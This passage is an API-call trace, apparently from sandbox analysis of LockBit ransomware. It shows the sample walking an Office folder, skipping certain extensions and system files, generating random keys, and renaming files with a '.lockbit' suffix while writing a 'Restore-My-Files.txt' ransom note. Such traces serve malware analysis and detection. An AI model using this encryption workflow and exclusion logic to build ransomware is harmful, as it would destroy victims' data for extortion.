nFileSizeLow=0xdde, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18194_.WMF", cAlternateFileName="")) returned 1 [0199.866] lstrcmpiW (lpString1=".", lpString2="BD18194_.WMF") returned -1 [0199.866] lstrcmpiW (lpString1="..", lpString2="BD18194_.WMF") returned -1 [0199.866] PathFindExtensionW (pszPath="BD18194_.WMF") returned=".WMF" [0199.866] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.866] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.867] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.867] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18194_.WMF") returned 1 [0199.867] lstrcmpiW (lpString1="ntldr", lpString2="BD18194_.WMF") returned 1 [0199.868] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18194_.WMF") returned 1 [0199.868] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18194_.WMF") returned 1 [0199.868] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18194_.WMF") returned -1 [0199.868] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18194_.WMF") returned 1 [0199.868] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18194_.WMF") returned 1 [0199.868] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.868] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF") returned=".WMF" [0199.868] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.868] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.868] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.869] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.869] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.869] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.869] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF.lockbit") returned 79 [0199.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18194_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.870] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.870] malloc (_Size=0x40068) returned 0x3df0008 [0199.870] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3550) returned 1 [0199.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.871] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.872] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.872] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.872] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.873] free (_Block=0x1fa2ed8) [0199.873] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.874] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.874] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.874] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4404e00, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcb8d7a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf4404e00, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0x5a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18196_.WMF", cAlternateFileName="")) returned 1 [0199.874] lstrcmpiW (lpString1=".", lpString2="BD18196_.WMF") returned -1 [0199.874] lstrcmpiW (lpString1="..", lpString2="BD18196_.WMF") returned -1 [0199.874] PathFindExtensionW (pszPath="BD18196_.WMF") returned=".WMF" [0199.874] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.874] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.875] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.875] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18196_.WMF") returned 1 [0199.876] lstrcmpiW (lpString1="ntldr", lpString2="BD18196_.WMF") returned 1 [0199.876] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18196_.WMF") returned 1 [0199.876] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18196_.WMF") returned 1 [0199.876] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18196_.WMF") returned -1 [0199.876] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18196_.WMF") returned 1 [0199.876] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18196_.WMF") returned 1 [0199.876] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.876] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF") returned=".WMF" [0199.876] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.876] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.876] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.877] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.877] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF.lockbit") returned 79 [0199.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18196_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.878] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.878] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.878] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1444) returned 1 [0199.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.879] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.883] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.883] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.883] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.884] free (_Block=0x1fa2ed8) [0199.884] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.884] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.885] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6adbc800, ftCreationTime.dwHighDateTime=0x1bdfe4c, ftLastAccessTime.dwLowDateTime=0xbcb8d7a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6adbc800, ftLastWriteTime.dwHighDateTime=0x1bdfe4c, nFileSizeHigh=0x0, nFileSizeLow=0x5b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18197_.WMF", cAlternateFileName="")) returned 1 [0199.885] lstrcmpiW (lpString1=".", lpString2="BD18197_.WMF") returned -1 [0199.885] lstrcmpiW (lpString1="..", lpString2="BD18197_.WMF") returned -1 [0199.885] PathFindExtensionW (pszPath="BD18197_.WMF") returned=".WMF" [0199.885] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.885] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.886] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.886] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18197_.WMF") returned 1 [0199.887] lstrcmpiW (lpString1="ntldr", lpString2="BD18197_.WMF") returned 1 [0199.887] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18197_.WMF") returned 1 [0199.887] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18197_.WMF") returned 1 [0199.887] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18197_.WMF") returned -1 [0199.887] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18197_.WMF") returned 1 [0199.887] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18197_.WMF") returned 1 [0199.887] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.887] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF") returned=".WMF" [0199.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.887] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.887] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 